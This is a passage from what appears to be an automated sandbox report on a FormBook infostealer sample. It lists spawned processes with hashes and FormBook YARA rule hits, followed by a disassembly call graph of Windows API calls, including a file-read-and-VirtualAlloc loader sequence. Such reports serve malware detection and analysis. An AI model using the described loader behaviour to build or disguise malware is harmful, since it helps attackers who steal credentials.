                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:2
                    Start time:11:39:23
                    Start date:22/09/2024
                    Path:C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe"
                    Imagebase:0xbf0000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:3
                    Start time:11:39:27
                    Start date:22/09/2024
                    Path:C:\Windows\SysWOW64\at.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\SysWOW64\at.exe"
                    Imagebase:0xb20000
                    File size:25'088 bytes
                    MD5 hash:2AE20048111861FA09B709D3CC551AD6
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    Reputation:moderate
                    Has exited:false

                    General

                    Target ID:7
                    Start time:11:39:39
                    Start date:22/09/2024
                    Path:C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe"
                    Imagebase:0xbf0000
                    File size:140'800 bytes
                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:8
                    Start time:11:40:02
                    Start date:22/09/2024
                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Imagebase:0x7ff6bf500000
                    File size:676'768 bytes
                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:3.3%
                      Dynamic/Decrypted Code Coverage:1%
                      Signature Coverage:4.2%
                      Total number of Nodes:1893
                      Total number of Limit Nodes:36
                      execution_graph 84246 4010e0 84249 401100 84246->84249 84248 4010f8 84250 401113 84249->84250 84251 401182 84250->84251 84253 401120 84250->84253 84254 401184 84250->84254 84255 40114c 84250->84255 84252 40112c DefWindowProcW 84251->84252 84252->84248 84253->84252 84294 401000 Shell_NotifyIconW setSBUpLow 84253->84294 84287 401250 61 API calls setSBUpLow 84254->84287 84256 401151 84255->84256 84257 40119d 84255->84257 84259 401219 84256->84259 84260 40115d 84256->84260 84262 4011a3 84257->84262 84263 42afb4 84257->84263 84259->84253 84266 401225 84259->84266 84264 401163 84260->84264 84265 42b01d 84260->84265 84261 401193 84261->84248 84262->84253 84272 4011b6 KillTimer 84262->84272 84273 4011db SetTimer RegisterWindowMessageW 84262->84273 84289 40f190 10 API calls 84263->84289 84269 42afe9 84264->84269 84270 40116c 84264->84270 84265->84252 84293 4370f4 52 API calls 84265->84293 84296 468b0e 74 API calls setSBUpLow 84266->84296 84291 40f190 10 API calls 84269->84291 84270->84253 84276 401174 84270->84276 84271 42b04f 84295 40e0c0 74 API calls setSBUpLow 84271->84295 84288 401000 Shell_NotifyIconW setSBUpLow 84272->84288 84273->84261 84274 401204 CreatePopupMenu 84273->84274 84274->84248 84290 45fd57 65 API calls setSBUpLow 84276->84290 84281 42afe4 84281->84261 84282 42b00e 84292 401a50 338 API calls 84282->84292 84283 4011c9 PostQuitMessage 84283->84248 84286 42afdc 84286->84252 84286->84281 84287->84261 84288->84283 84289->84261 84290->84286 84291->84282 84292->84251 84293->84251 84294->84271 84295->84251 84296->84281 84297 40bd20 84298 428194 84297->84298 84299 40bd2d 84297->84299 84300 40bd43 84298->84300 84301 4281bc 84298->84301 84303 4281b2 84298->84303 84307 40bd37 84299->84307 84320 4531b1 85 API calls 5 library calls 84299->84320 84319 45e987 86 API calls moneypunct 84301->84319 84318 40b510 VariantClear 84303->84318 84309 40bd50 84307->84309 84308 4281ba 84310 426cf1 84309->84310 84311 40bd63 84309->84311 84330 44cde9 52 API calls _memmove 84310->84330 84321 40bd80 84311->84321 84314 40bd73 84314->84300 84315 426cfc 84331 40e0a0 84315->84331 84317 426d02 84318->84308 84319->84299 84320->84307 84322 40bd8e 84321->84322 84323 40bdb7 _memmove 84321->84323 84322->84323 84324 40bded 84322->84324 84325 40bdad 84322->84325 84323->84314 84341 4115d7 84324->84341 84335 402f00 84325->84335 84329 4115d7 52 API calls 84329->84323 84330->84315 84332 40e0b2 84331->84332 84333 40e0a8 84331->84333 84332->84317 84375 403c30 52 API calls _memmove 84333->84375 84336 402f10 84335->84336 84337 402f0c 84335->84337 84338 4115d7 52 API calls 84336->84338 84339 4268c3 84336->84339 84337->84323 84340 402f51 moneypunct _memmove 84338->84340 84340->84323 84343 4115e1 _malloc 84341->84343 84344 40bdf6 84343->84344 84347 4115fd std::exception::exception 84343->84347 84352 4135bb 84343->84352 84344->84323 84344->84329 84345 41163b 84367 4180af 46 API calls std::exception::operator= 84345->84367 84347->84345 84366 41130a 51 API calls __cinit 84347->84366 84348 411645 84368 418105 RaiseException 84348->84368 84351 411656 84353 413638 _malloc 84352->84353 84358 4135c9 _malloc 84352->84358 84374 417f77 46 API calls __getptd_noexit 84353->84374 84356 4135f7 RtlAllocateHeap 84356->84358 84365 413630 84356->84365 84358->84356 84359 413624 84358->84359 84360 4135d4 84358->84360 84363 413622 84358->84363 84372 417f77 46 API calls __getptd_noexit 84359->84372 84360->84358 84369 418901 46 API calls __NMSG_WRITE 84360->84369 84370 418752 46 API calls 8 library calls 84360->84370 84371 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84360->84371 84373 417f77 46 API calls __getptd_noexit 84363->84373 84365->84343 84366->84345 84367->84348 84368->84351 84369->84360 84370->84360 84372->84363 84373->84365 84374->84365 84375->84332 84376 425ba2 84381 40e360 84376->84381 84378 425bb4 84397 41130a 51 API calls __cinit 84378->84397 84380 425bbe 84382 4115d7 52 API calls 84381->84382 84383 40e3ec GetModuleFileNameW 84382->84383 84398 413a0e 84383->84398 84385 40e421 _wcsncat 84401 413a9e 84385->84401 84388 4115d7 52 API calls 84389 40e45e _wcscpy 84388->84389 84404 40bc70 84389->84404 84393 40e4a9 84393->84378 84394 401c90 52 API calls 84395 40e4a1 _wcscat _wcslen _wcsncpy 84394->84395 84395->84393 84395->84394 84396 4115d7 52 API calls 84395->84396 84396->84395 84397->84380 84423 413801 84398->84423 84453 419efd 84401->84453 84405 4115d7 52 API calls 84404->84405 84406 40bc98 84405->84406 84407 4115d7 52 API calls 84406->84407 84408 40bca6 84407->84408 84409 40e4c0 84408->84409 84465 403350 84409->84465 84411 40e4cb RegOpenKeyExW 84412 427190 RegQueryValueExW 84411->84412 84413 40e4eb 84411->84413 84414 4271b0 84412->84414 84415 42721a RegCloseKey 84412->84415 84413->84395 84416 4115d7 52 API calls 84414->84416 84415->84395 84417 4271cb 84416->84417 84472 43652f 52 API calls 84417->84472 84419 4271d8 RegQueryValueExW 84420 42720e 84419->84420 84421 4271f7 84419->84421 84420->84415 84473 402160 84421->84473 84424 41389e 84423->84424 84431 41381a 84423->84431 84425 4139e8 84424->84425 84426 413a00 84424->84426 84450 417f77 46 API calls __getptd_noexit 84425->84450 84452 417f77 46 API calls __getptd_noexit 84426->84452 84428 4139ed 84451 417f25 10 API calls _fseek 84428->84451 84431->84424 84436 41388a 84431->84436 84445 419e30 46 API calls _fseek 84431->84445 84433 41396c 84433->84424 84434 413967 84433->84434 84437 41397a 84433->84437 84434->84385 84435 413929 84435->84424 84438 413945 84435->84438 84447 419e30 46 API calls _fseek 84435->84447 84436->84424 84444 413909 84436->84444 84446 419e30 46 API calls _fseek 84436->84446 84449 419e30 46 API calls _fseek 84437->84449 84438->84424 84438->84434 84441 41395b 84438->84441 84448 419e30 46 API calls _fseek 84441->84448 84444->84433 84444->84435 84445->84436 84446->84444 84447->84438 84448->84434 84449->84434 84450->84428 84451->84434 84452->84434 84454 419f13 84453->84454 84455 419f0e 84453->84455 84462 417f77 46 API calls __getptd_noexit 84454->84462 84455->84454 84459 419f2b 84455->84459 84457 419f18 84463 417f25 10 API calls _fseek 84457->84463 84460 40e454 84459->84460 84464 417f77 46 API calls __getptd_noexit 84459->84464 84460->84388 84462->84457 84463->84460 84464->84457 84466 403367 84465->84466 84467 403358 84465->84467 84468 4115d7 52 API calls 84466->84468 84467->84411 84469 403370 84468->84469 84470 4115d7 52 API calls 84469->84470 84471 40339e 84470->84471 84471->84411 84472->84419 84474 426daa 84473->84474 84475 40216b _wcslen 84473->84475 84488 40c600 84474->84488 84478 402180 84475->84478 84479 40219e 84475->84479 84477 426db5 84477->84420 84486 403bd0 52 API calls moneypunct 84478->84486 84487 4013a0 52 API calls 84479->84487 84482 4021a5 84483 426db7 84482->84483 84484 4115d7 52 API calls 84482->84484 84485 402187 _memmove 84484->84485 84485->84420 84486->84485 84487->84482 84489 40c619 84488->84489 84490 40c60a 84488->84490 84489->84477 84490->84489 84493 4026f0 84490->84493 84492 426d7a _memmove 84492->84477 84494 426873 84493->84494 84495 4026ff 84493->84495 84500 4013a0 52 API calls 84494->84500 84495->84492 84497 42687b 84498 4115d7 52 API calls 84497->84498 84499 42689e _memmove 84498->84499 84499->84492 84500->84497 84501 40d1408 84515 40cf058 84501->84515 84503 40d14ce 84518 40d12f8 84503->84518 84505 40d14f7 CreateFileW 84507 40d154b 84505->84507 84508 40d1546 84505->84508 84507->84508 84509 40d1562 VirtualAlloc 84507->84509 84509->84508 84510 40d1580 ReadFile 84509->84510 84510->84508 84511 40d159b 84510->84511 84512 40d02f8 13 API calls 84511->84512 84513 40d15ce 84512->84513 84514 40d15f1 ExitProcess 84513->84514 84514->84508 84521 40d24f8 GetPEB 84515->84521 84517 40cf6e3 84517->84503 84519 40d1301 Sleep 84518->84519 84520 40d130f 84519->84520 84522 40d2522 84521->84522 84522->84517 84523 416454 84560 416c70 84523->84560 84525 416460 GetStartupInfoW 84526 416474 84525->84526 84561 419d5a HeapCreate 84526->84561 84528 4164cd 84529 4164d8 84528->84529 84645 41642b 46 API calls 3 library calls 84528->84645 84562 417c20 GetModuleHandleW 84529->84562 84532 4164de 84533 4164e9 __RTC_Initialize 84532->84533 84646 41642b 46 API calls 3 library calls 84532->84646 84581 41aaa1 GetStartupInfoW 84533->84581 84537 416503 GetCommandLineW 84594 41f584 GetEnvironmentStringsW 84537->84594 84540 416513 84600 41f4d6 GetModuleFileNameW 84540->84600 84543 41651d 84544 416528 84543->84544 84648 411924 46 API calls 3 library calls 84543->84648 84604 41f2a4 84544->84604 84547 41652e 84548 416539 84547->84548 84649 411924 46 API calls 3 library calls 84547->84649 84618 411703 84548->84618 84551 416541 84553 41654c __wwincmdln 84551->84553 84650 411924 46 API calls 3 library calls 84551->84650 84622 40d6b0 84553->84622 84556 41657c 84652 411906 46 API calls _doexit 84556->84652 84559 416581 _fseek 84560->84525 84561->84528 84563 417c34 84562->84563 84564 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84562->84564 84653 4178ff 49 API calls _free 84563->84653 84566 417c87 TlsAlloc 84564->84566 84569 417cd5 TlsSetValue 84566->84569 84570 417d96 84566->84570 84567 417c39 84567->84532 84569->84570 84571 417ce6 __init_pointers 84569->84571 84570->84532 84654 418151 InitializeCriticalSectionAndSpinCount 84571->84654 84573 417d91 84662 4178ff 49 API calls _free 84573->84662 84575 417d2a 84575->84573 84655 416b49 84575->84655 84578 417d76 84661 41793c 46 API calls 4 library calls 84578->84661 84580 417d7e GetCurrentThreadId 84580->84570 84582 416b49 __calloc_crt 46 API calls 84581->84582 84591 41aabf 84582->84591 84583 41ac6a GetStdHandle 84588 41ac34 84583->84588 84584 416b49 __calloc_crt 46 API calls 84584->84591 84585 41acce SetHandleCount 84593 4164f7 84585->84593 84586 41ac7c GetFileType 84586->84588 84587 41abb4 84587->84588 84589 41abe0 GetFileType 84587->84589 84590 41abeb InitializeCriticalSectionAndSpinCount 84587->84590 84588->84583 84588->84585 84588->84586 84592 41aca2 InitializeCriticalSectionAndSpinCount 84588->84592 84589->84587 84589->84590 84590->84587 84590->84593 84591->84584 84591->84587 84591->84588 84591->84593 84592->84588 84592->84593 84593->84537 84647 411924 46 API calls 3 library calls 84593->84647 84595 41f595 84594->84595 84596 41f599 84594->84596 84595->84540 84672 416b04 84596->84672 84598 41f5bb _memmove 84599 41f5c2 FreeEnvironmentStringsW 84598->84599 84599->84540 84602 41f50b _wparse_cmdline 84600->84602 84601 41f54e _wparse_cmdline 84601->84543 84602->84601 84603 416b04 __malloc_crt 46 API calls 84602->84603 84603->84601 84605 41f2bc _wcslen 84604->84605 84609 41f2b4 84604->84609 84606 416b49 __calloc_crt 46 API calls 84605->84606 84611 41f2e0 _wcslen 84606->84611 84607 41f336 84679 413748 84607->84679 84609->84547 84610 416b49 __calloc_crt 46 API calls 84610->84611 84611->84607 84611->84609 84611->84610 84612 41f35c 84611->84612 84615 41f373 84611->84615 84678 41ef12 46 API calls _fseek 84611->84678 84613 413748 _free 46 API calls 84612->84613 84613->84609 84685 417ed3 84615->84685 84617 41f37f 84617->84547 84619 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84618->84619 84621 411750 __IsNonwritableInCurrentImage 84619->84621 84704 41130a 51 API calls __cinit 84619->84704 84621->84551 84623 42e2f3 84622->84623 84624 40d6cc 84622->84624 84705 408f40 84624->84705 84626 40d707 84709 40ebb0 84626->84709 84629 40d737 84712 411951 84629->84712 84634 40d751 84724 40f4e0 SystemParametersInfoW SystemParametersInfoW 84634->84724 84636 40d75f 84725 40d590 GetCurrentDirectoryW 84636->84725 84638 40d767 SystemParametersInfoW 84639 40d794 84638->84639 84640 40d78d FreeLibrary 84638->84640 84641 408f40 VariantClear 84639->84641 84640->84639 84642 40d79d 84641->84642 84643 408f40 VariantClear 84642->84643 84644 40d7a6 84643->84644 84644->84556 84651 4118da 46 API calls _doexit 84644->84651 84645->84529 84646->84533 84651->84556 84652->84559 84653->84567 84654->84575 84657 416b52 84655->84657 84658 416b8f 84657->84658 84659 416b70 Sleep 84657->84659 84663 41f677 84657->84663 84658->84573 84658->84578 84660 416b85 84659->84660 84660->84657 84660->84658 84661->84580 84662->84570 84664 41f683 84663->84664 84670 41f69e _malloc 84663->84670 84665 41f68f 84664->84665 84664->84670 84671 417f77 46 API calls __getptd_noexit 84665->84671 84667 41f6b1 HeapAlloc 84669 41f6d8 84667->84669 84667->84670 84668 41f694 84668->84657 84669->84657 84670->84667 84670->84669 84671->84668 84675 416b0d 84672->84675 84673 4135bb _malloc 45 API calls 84673->84675 84674 416b43 84674->84598 84675->84673 84675->84674 84676 416b24 Sleep 84675->84676 84677 416b39 84676->84677 84677->84674 84677->84675 84678->84611 84680 41377c _free 84679->84680 84681 413753 RtlFreeHeap 84679->84681 84680->84609 84681->84680 84682 413768 84681->84682 84688 417f77 46 API calls __getptd_noexit 84682->84688 84684 41376e GetLastError 84684->84680 84689 417daa 84685->84689 84688->84684 84690 417dc9 setSBUpLow __call_reportfault 84689->84690 84691 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84690->84691 84694 417eb5 __call_reportfault 84691->84694 84693 417ed1 GetCurrentProcess TerminateProcess 84693->84617 84695 41a208 84694->84695 84696 41a210 84695->84696 84697 41a212 IsDebuggerPresent 84695->84697 84696->84693 84703 41fe19 84697->84703 84700 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84701 421ff0 __call_reportfault 84700->84701 84702 421ff8 GetCurrentProcess TerminateProcess 84700->84702 84701->84702 84702->84693 84703->84700 84704->84621 84706 408f48 moneypunct 84705->84706 84707 4265c7 VariantClear 84706->84707 84708 408f55 moneypunct 84706->84708 84707->84708 84708->84626 84765 40ebd0 84709->84765 84769 4182cb 84712->84769 84714 41195e 84776 4181f2 LeaveCriticalSection 84714->84776 84716 40d748 84717 4119b0 84716->84717 84718 4119d6 84717->84718 84719 4119bc 84717->84719 84718->84634 84719->84718 84811 417f77 46 API calls __getptd_noexit 84719->84811 84721 4119c6 84812 417f25 10 API calls _fseek 84721->84812 84723 4119d1 84723->84634 84724->84636 84813 401f20 84725->84813 84727 40d5b6 IsDebuggerPresent 84728 40d5c4 84727->84728 84729 42e1bb MessageBoxA 84727->84729 84730 42e1d4 84728->84730 84731 40d5e3 84728->84731 84729->84730 84986 403a50 52 API calls 3 library calls 84730->84986 84883 40f520 84731->84883 84735 40d63b 84738 40d643 84735->84738 84739 42e231 SetCurrentDirectoryW 84735->84739 84736 40d5fd GetFullPathNameW 84895 401460 84736->84895 84740 40d64c 84738->84740 84987 432fee 6 API calls 84738->84987 84739->84738 84910 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84740->84910 84743 42e252 84743->84740 84745 42e25a GetModuleFileNameW 84743->84745 84747 42e274 84745->84747 84748 42e2cb GetForegroundWindow ShellExecuteW 84745->84748 84988 401b10 84747->84988 84750 40d688 84748->84750 84749 40d656 84752 40d669 84749->84752 84984 40e0c0 74 API calls setSBUpLow 84749->84984 84756 40d692 SetCurrentDirectoryW 84750->84756 84918 4091e0 84752->84918 84756->84638 84759 42e28d 84995 40d200 52 API calls 2 library calls 84759->84995 84762 42e299 GetForegroundWindow ShellExecuteW 84763 42e2c6 84762->84763 84763->84750 84764 40ec00 LoadLibraryA GetProcAddress 84764->84629 84766 40d72e 84765->84766 84767 40ebd6 LoadLibraryA 84765->84767 84766->84629 84766->84764 84767->84766 84768 40ebe7 GetProcAddress 84767->84768 84768->84766 84770 4182e0 84769->84770 84771 4182f3 EnterCriticalSection 84769->84771 84777 418209 84770->84777 84771->84714 84773 4182e6 84773->84771 84804 411924 46 API calls 3 library calls 84773->84804 84776->84716 84778 418215 _fseek 84777->84778 84779 418225 84778->84779 84780 41823d 84778->84780 84805 418901 46 API calls __NMSG_WRITE 84779->84805 84782 416b04 __malloc_crt 45 API calls 84780->84782 84788 41824b _fseek 84780->84788 84784 418256 84782->84784 84783 41822a 84806 418752 46 API calls 8 library calls 84783->84806 84786 41825d 84784->84786 84787 41826c 84784->84787 84808 417f77 46 API calls __getptd_noexit 84786->84808 84791 4182cb __lock 45 API calls 84787->84791 84788->84773 84789 418231 84807 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84789->84807 84793 418273 84791->84793 84795 4182a6 84793->84795 84796 41827b InitializeCriticalSectionAndSpinCount 84793->84796 84797 413748 _free 45 API calls 84795->84797 84798 418297 84796->84798 84799 41828b 84796->84799 84797->84798 84810 4182c2 LeaveCriticalSection _doexit 84798->84810 84800 413748 _free 45 API calls 84799->84800 84802 418291 84800->84802 84809 417f77 46 API calls __getptd_noexit 84802->84809 84805->84783 84806->84789 84808->84788 84809->84798 84810->84788 84811->84721 84812->84723 84996 40e6e0 84813->84996 84817 401f41 GetModuleFileNameW 85014 410100 84817->85014 84819 401f5c 85026 410960 84819->85026 84822 401b10 52 API calls 84823 401f81 84822->84823 85029 401980 84823->85029 84825 401f8e 84826 408f40 VariantClear 84825->84826 84827 401f9d 84826->84827 84828 401b10 52 API calls 84827->84828 84829 401fb4 84828->84829 84830 401980 53 API calls 84829->84830 84831 401fc3 84830->84831 84832 401b10 52 API calls 84831->84832 84833 401fd2 84832->84833 85037 40c2c0 84833->85037 84835 401fe1 84836 40bc70 52 API calls 84835->84836 84837 401ff3 84836->84837 85055 401a10 84837->85055 84839 401ffe 85062 4114ab 84839->85062 84842 428b05 84844 401a10 52 API calls 84842->84844 84843 402017 84845 4114ab __wcsicoll 58 API calls 84843->84845 84846 428b18 84844->84846 84847 402022 84845->84847 84849 401a10 52 API calls 84846->84849 84847->84846 84848 40202d 84847->84848 84850 4114ab __wcsicoll 58 API calls 84848->84850 84851 428b33 84849->84851 84852 402038 84850->84852 84854 428b3b GetModuleFileNameW 84851->84854 84853 402043 84852->84853 84852->84854 84855 4114ab __wcsicoll 58 API calls 84853->84855 84856 401a10 52 API calls 84854->84856 84857 40204e 84855->84857 84858 428b6c 84856->84858 84859 402092 84857->84859 84863 401a10 52 API calls 84857->84863 84868 428b90 _wcscpy 84857->84868 84860 40e0a0 52 API calls 84858->84860 84862 4020a3 84859->84862 84859->84868 84861 428b7a 84860->84861 84864 401a10 52 API calls 84861->84864 84865 428bc6 84862->84865 85070 40e830 53 API calls 84862->85070 84866 402073 _wcscpy 84863->84866 84867 428b88 84864->84867 84873 401a10 52 API calls 84866->84873 84867->84868 84870 401a10 52 API calls 84868->84870 84878 4020d0 84870->84878 84871 4020bb 85071 40cf00 53 API calls 84871->85071 84873->84859 84874 4020c6 84875 408f40 VariantClear 84874->84875 84875->84878 84877 402110 84880 408f40 VariantClear 84877->84880 84878->84877 84881 401a10 52 API calls 84878->84881 85072 40cf00 53 API calls 84878->85072 85073 40e6a0 53 API calls 84878->85073 84882 402120 moneypunct 84880->84882 84881->84878 84882->84727 84884 4295c9 setSBUpLow 84883->84884 84885 40f53c 84883->84885 84887 4295d9 GetOpenFileNameW 84884->84887 85749 410120 84885->85749 84887->84885 84889 40d5f5 84887->84889 84888 40f545 85753 4102b0 SHGetMalloc 84888->85753 84889->84735 84889->84736 84891 40f54c 85758 410190 GetFullPathNameW 84891->85758 84893 40f559 85769 40f570 84893->85769 85831 402400 84895->85831 84897 40146f 84900 428c29 _wcscat 84897->84900 85840 401500 84897->85840 84899 40147c 84899->84900 85848 40d440 84899->85848 84902 401489 84902->84900 84903 401491 GetFullPathNameW 84902->84903 84904 402160 52 API calls 84903->84904 84905 4014bb 84904->84905 84906 402160 52 API calls 84905->84906 84907 4014c8 84906->84907 84907->84900 84908 402160 52 API calls 84907->84908 84909 4014ee 84908->84909 84909->84735 84911 428361 84910->84911 84912 4103fc LoadImageW RegisterClassExW 84910->84912 85919 44395e EnumResourceNamesW LoadImageW 84911->85919 85918 410490 7 API calls 84912->85918 84915 40d651 84917 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84915->84917 84916 428368 84917->84749 84919 409202 84918->84919 84920 42d7ad 84918->84920 84978 409216 moneypunct 84919->84978 86056 410940 338 API calls 84919->86056 86059 45e737 90 API calls 3 library calls 84920->86059 84923 409386 84924 40939c 84923->84924 86057 40f190 10 API calls 84923->86057 84924->84750 84985 401000 Shell_NotifyIconW setSBUpLow 84924->84985 84926 4095b2 84926->84924 84928 4095bf 84926->84928 84927 409253 PeekMessageW 84927->84978 86058 401a50 338 API calls 84928->86058 84930 42d8cd Sleep 84930->84978 84931 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84931->84924 84934 4095f9 84931->84934 84933 42e13b 86077 40d410 VariantClear 84933->86077 84937 42e158 TranslateMessage DispatchMessageW GetMessageW 84934->84937 84937->84937 84938 42e188 84937->84938 84938->84924 84940 409567 PeekMessageW 84940->84978 84942 46f3c1 107 API calls 84942->84978 84943 40e0a0 52 API calls 84943->84978 84944 46fdbf 108 API calls 84975 4094e0 84944->84975 84945 42dcd2 WaitForSingleObject 84952 42dcf0 GetExitCodeProcess CloseHandle 84945->84952 84945->84978 84946 409551 TranslateMessage DispatchMessageW 84946->84940 84949 44c29d 52 API calls 84949->84975 84950 42dd3d Sleep 84950->84975 84951 47d33e 316 API calls 84951->84978 86066 40d410 VariantClear 84952->86066 84955 4094cf Sleep 84955->84975 84957 42d94d timeGetTime 86062 465124 53 API calls 84957->86062 84959 40d410 VariantClear 84959->84978 84960 40c620 timeGetTime 84960->84975 84962 465124 53 API calls 84962->84975 84964 42dd89 CloseHandle 84964->84975 84966 42de19 GetExitCodeProcess CloseHandle 84966->84975 84967 401b10 52 API calls 84967->84975 84970 42de88 Sleep 84970->84978 84973 401980 53 API calls 84973->84975 84974 45e737 90 API calls 84974->84978 84975->84944 84975->84949 84975->84960 84975->84962 84975->84964 84975->84966 84975->84967 84975->84970 84975->84973 84975->84978 84983 408f40 VariantClear 84975->84983 86063 45178a 54 API calls 84975->86063 86064 47d33e 338 API calls 84975->86064 86065 453bc6 54 API calls 84975->86065 86067 40d410 VariantClear 84975->86067 86068 443d19 67 API calls _wcslen 84975->86068 86069 4574b4 VariantClear 84975->86069 86070 403cd0 84975->86070 86074 4731e1 VariantClear 84975->86074 86075 4331a2 6 API calls 84975->86075 84978->84923 84978->84927 84978->84930 84978->84933 84978->84940 84978->84942 84978->84943 84978->84945 84978->84946 84978->84950 84978->84951 84978->84955 84978->84957 84978->84959 84978->84974 84978->84975 84979 42e0cc VariantClear 84978->84979 84980 408f40 VariantClear 84978->84980 85920 4091b0 84978->85920 85978 40afa0 84978->85978 86004 408fc0 84978->86004 86039 408cc0 84978->86039 86053 4096a0 338 API calls 4 library calls 84978->86053 86054 40d150 TranslateAcceleratorW 84978->86054 86055 40d170 IsDialogMessageW GetClassLongW 84978->86055 86060 465124 53 API calls 84978->86060 86061 40c620 timeGetTime 84978->86061 86076 40e270 VariantClear moneypunct 84978->86076 84979->84978 84980->84978 84983->84975 84984->84752 84985->84750 84986->84735 84987->84743 84989 401b16 _wcslen 84988->84989 84990 4115d7 52 API calls 84989->84990 84993 401b63 84989->84993 84991 401b4b _memmove 84990->84991 84992 4115d7 52 API calls 84991->84992 84992->84993 84994 40d200 52 API calls 2 library calls 84993->84994 84994->84759 84995->84762 84997 40bc70 52 API calls 84996->84997 84998 401f31 84997->84998 84999 402560 84998->84999 85000 40256d __write_nolock 84999->85000 85001 402160 52 API calls 85000->85001 85003 402593 85001->85003 85013 4025bd 85003->85013 85074 401c90 85003->85074 85004 4026f0 52 API calls 85004->85013 85005 4026a7 85006 401b10 52 API calls 85005->85006 85012 4026db 85005->85012 85008 4026d1 85006->85008 85007 401b10 52 API calls 85007->85013 85078 40d7c0 52 API calls 2 library calls 85008->85078 85009 401c90 52 API calls 85009->85013 85012->84817 85013->85004 85013->85005 85013->85007 85013->85009 85077 40d7c0 52 API calls 2 library calls 85013->85077 85079 40f760 85014->85079 85017 410118 85017->84819 85019 42805d 85020 42806a 85019->85020 85135 431e58 85019->85135 85022 413748 _free 46 API calls 85020->85022 85023 428078 85022->85023 85024 431e58 82 API calls 85023->85024 85025 428084 85024->85025 85025->84819 85027 4115d7 52 API calls 85026->85027 85028 401f74 85027->85028 85028->84822 85030 4019a3 85029->85030 85034 401985 85029->85034 85031 4019b8 85030->85031 85030->85034 85738 403e10 53 API calls 85031->85738 85033 40199f 85033->84825 85034->85033 85737 403e10 53 API calls 85034->85737 85036 4019c4 85036->84825 85038 40c2c7 85037->85038 85039 40c30e 85037->85039 85042 40c2d3 85038->85042 85043 426c79 85038->85043 85040 40c315 85039->85040 85041 426c2b 85039->85041 85044 40c321 85040->85044 85045 426c5a 85040->85045 85047 426c4b 85041->85047 85048 426c2e 85041->85048 85739 403ea0 52 API calls __cinit 85042->85739 85744 4534e3 52 API calls 85043->85744 85740 403ea0 52 API calls __cinit 85044->85740 85743 4534e3 52 API calls 85045->85743 85742 4534e3 52 API calls 85047->85742 85053 40c2de 85048->85053 85741 4534e3 52 API 